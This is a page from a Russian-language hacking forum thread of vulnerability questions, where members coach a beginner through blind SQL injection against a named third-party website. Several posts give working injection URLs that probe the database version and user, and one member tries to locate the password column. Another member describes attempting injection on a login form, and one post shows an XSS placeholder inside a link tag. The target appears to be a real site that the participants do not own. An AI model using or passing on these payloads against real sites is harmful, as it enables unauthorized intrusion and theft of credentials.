Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Вот в общем на milw0rm'е: http://milw0rm.com/papers/260
    Довольно свежая статья от M4g,а: http://www.xakep.ru/post/49508/default.asp
    Замечание от .Slip'а: https://forum.antichat.ru/thread99589.html
    Вот заметка от Raz0r'а: http://raz0r.name/articles/null-byte-alternative/
    Вот от [x26]VOLAND: https://forum.antichat.ru/thread119481.html
    Так-же в FAQ от jokester'а: https://forum.antichat.ru/thread104591.html
     
    #9401 Qwazar, 22 Oct 2009
    Last edited: 22 Oct 2009
    4 people like this.
  2. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Сам поищешь, или собрать для тебя по группам? Там карта раздела есть
    https://forum.antichat.ru/forum30.html
     
    1 person likes this.
  4. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    знаете английский ?
    нет такой таблицы
     
    1 person likes this.
  5. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Ну во первых tablE
    Во вторых, попробуй табличку users.
    В третьих, жмяк
     
    2 people like this.
  6. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    мб там таблица имеет название `tabla`
     
    2 people like this.
  7. -Денис-

    -Денис- Elder - Старейшина

    Joined:
    26 Aug 2008
    Messages:
    79
    Likes Received:
    13
    Reputations:
    0
    Я в деле sqlinj еще нуб, не так давно начал изучать работу с БД, так что прошу сильно не пинать
    В общем есть один сайтег, пытаюсь провести инжекцию добавлением в пост запрос полей username и password значения value="1'", но страница загружается так как будто данные не введены или введены но не верны, также пытался в поле пароля вставить символ %. Результат тот же. Попробовал вписать в value="admin'<?php echo 123; ?>';" Результат тот же. Отсюда делаю вывод, что символ ' экранируется.
    Кто что может еще предложить сделать
     
  8. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    Ничего не сделаешь.
     
  9. Patrik

    Patrik Elder - Старейшина

    Joined:
    15 Jan 2006
    Messages:
    42
    Likes Received:
    6
    Reputations:
    0
    Сканер сказал, что в http://apg-ua. com/index.php?o=66+and+31337-31337=0+--++ возможна инъекция, но что я не пишу в запрос - в ответ ничего. Помогите, пожалуйста, советом.
     
  10. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Сканер прав

    http://apg-ua.com/index.php?o=66+AND+SUBSTRING(VERSION(),1,1)=5+--+
     
    _________________________
  11. Patrik

    Patrik Elder - Старейшина

    Joined:
    15 Jan 2006
    Messages:
    42
    Likes Received:
    6
    Reputations:
    0
    Видимо я мало понимаю, но где смотреть ответ сервера?
     
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    В даном случае, если условие true, значит выведется страница, если нет - не выведется.
     
  13. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Это называется blind -sql -inj

    то есть при правильном запросе у тебя выдаст страницу которая должна быть, при не правильном , в твоем случае , вообще ни чего.
    то есть при http://apg-ua.com/index.php?o=66+AND+SUBSTRING(VERSION(),1,1)=5+--+ выдаст страницу , а при http://apg-ua.com/index.php?o=66+AND+SUBSTRING(VERSION(),1,1)=4+--+ ни чего не выводит,
     
    _________________________
  14. Patrik

    Patrik Elder - Старейшина

    Joined:
    15 Jan 2006
    Messages:
    42
    Likes Received:
    6
    Reputations:
    0
    Вот только строки user() нету. Что делать? Т.е. substring(user(),1,1) не обрабатывается.
     
  15. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Всё просто, в текущей БД database нет таблицы tabla :)
    _ttp://apg-ua.com/index.php?o=66+AND+SUBSTRING(UsEr(),1,1)=0+--+
     
    #9415 DrAssault, 23 Oct 2009
    Last edited: 23 Oct 2009
  16. Patrik

    Patrik Elder - Старейшина

    Joined:
    15 Jan 2006
    Messages:
    42
    Likes Received:
    6
    Reputations:
    0
    Получается строка user пустая. Где тогда искать?
     
  17. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Patrik,
    _http://forum.antichat.ru/thread119047.html , _https://forum.antichat.ru/threadnav35207-1-10.html
     
  18. Patrik

    Patrik Elder - Старейшина

    Joined:
    15 Jan 2006
    Messages:
    42
    Likes Received:
    6
    Reputations:
    0
    _http://apg-ua.com/index.php?o=66+AND+substring(Password(),1,1)<100--
    Пол царства за имя поля с паролем :)
     
    2 people like this.
  19. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    нет
     
    3 people like this.
  20. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Возможно, если XSS внутри тега, к примеру:
    Code:
    <a href="[XSS]">link</a>
     
    2 people like this.
Thread Status:
Not open for further replies.